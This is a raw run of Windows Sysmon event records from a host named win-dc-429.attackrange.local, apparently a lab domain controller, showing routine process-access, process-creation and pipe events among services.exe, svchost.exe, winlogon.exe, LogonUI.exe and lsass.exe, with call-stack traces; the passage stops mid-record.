09:20:00.248{5EBD8912-8CBD-6151-0A00-00000000FD01}624700C:\Windows\system32\services.exe{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052600Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.248{5EBD8912-8CBF-6151-0C00-00000000FD01}844960C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0900-00000000FD01}572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052599Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.251{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\System32\svchost.exe -k termsvcsC:\Windows\system32\NT AUTHORITY\NETWORK SERVICE{5EBD8912-8CBF-6151-E403-000000000000}0x3e40SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001052598Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.248{5EBD8912-8CBF-6151-0C00-00000000FD01}844960C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0900-00000000FD01}572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052597Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.248{5EBD8912-8CBD-6151-0B00-00000000FD01}640672C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d7e|C:\Windows\system32\lsasrv.dll+1d1c8|C:\Windows\system32\lsasrv.dll+1c3f1|C:\Windows\system32\lsasrv.dll+1ac10|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052596Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.248{5EBD8912-8CBF-6151-0C00-00000000FD01}844960C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052595Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.248{5EBD8912-8CBF-6151-0C00-00000000FD01}844960C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052594Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.248{5EBD8912-8CBF-6151-0C00-00000000FD01}844960C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052593Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.248{5EBD8912-8CBF-6151-0C00-00000000FD01}844960C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052592Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.248{5EBD8912-8CBD-6151-0B00-00000000FD01}640680C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052591Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.248{5EBD8912-8CBD-6151-0B00-00000000FD01}640672C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052590Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.248{5EBD8912-8CBF-6151-0C00-00000000FD01}844960C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052589Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.248{5EBD8912-8CBF-6151-0C00-00000000FD01}844960C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052588Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.248{5EBD8912-8CBD-6151-0B00-00000000FD01}640672C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052587Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.232{5EBD8912-8CBD-6151-0800-00000000FD01}496592C:\Windows\system32\csrss.exe{5EBD8912-8CC0-6151-0E00-00000000FD01}1008C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052586Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.232{5EBD8912-8CBD-6151-0900-00000000FD01}572576C:\Windows\system32\winlogon.exe{5EBD8912-8CC0-6151-0E00-00000000FD01}1008C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\winlogon.exe+193b7|C:\Windows\system32\winlogon.exe+22617|C:\Windows\system32\winlogon.exe+2b287|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052585Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.236{5EBD8912-8CC0-6151-0E00-00000000FD01}1008C:\Windows\System32\LogonUI.exe10.0.14393.0 (rs1_release.160715-1616)Windows Logon User Interface HostMicrosoft® Windows® Operating SystemMicrosoft Corporationlogonui.exe"LogonUI.exe" /flags:0x2 /state0:0xa3b8e855 /state1:0x41c64e6dC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e71SystemMD5=B38DFCF985D8AE5B1A17C264981E61C7,SHA256=AA62D29803D52EC06CD27ED3124E034048F09606EB7342181913C9817C7B44C5,IMPHASH=A6F3A84D171E55B51A7343E05C8DFAC3{5EBD8912-8CBD-6151-0900-00000000FD01}572C:\Windows\System32\winlogon.exewinlogon.exe 10341000x80000000000000001052584Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.232{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052583Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.232{5EBD8912-8CBD-6151-0B00-00000000FD01}640840C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0900-00000000FD01}572C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052582Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.232{5EBD8912-8CBD-6151-0B00-00000000FD01}640840C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0900-00000000FD01}572C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052581Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.232{5EBD8912-8CBD-6151-0B00-00000000FD01}640840C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0900-00000000FD01}572C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052580Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.139{5EBD8912-8CBF-6151-0C00-00000000FD01}844872C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0900-00000000FD01}572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2387f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052579Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.139{5EBD8912-8CBF-6151-0C00-00000000FD01}844872C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0900-00000000FD01}572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+2380c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052578Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.139{5EBD8912-8CBF-6151-0C00-00000000FD01}844872C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0900-00000000FD01}572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+237c4|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052577Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.139{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0500-00000000FD01}416C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+1a7a4|c:\windows\system32\lsm.dll+1aa31|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052576Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.139{5EBD8912-8CBF-6151-0C00-00000000FD01}844872C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0800-00000000FD01}496C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+1a7a4|c:\windows\system32\lsm.dll+1aa31|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x80000000000000001052575Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:20:00.139{5EBD8912-8CBF-6151-0C00-00000000FD01}844\LSM_API_serviceC:\Windows\system32\svchost.exe 10341000x80000000000000001052574Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 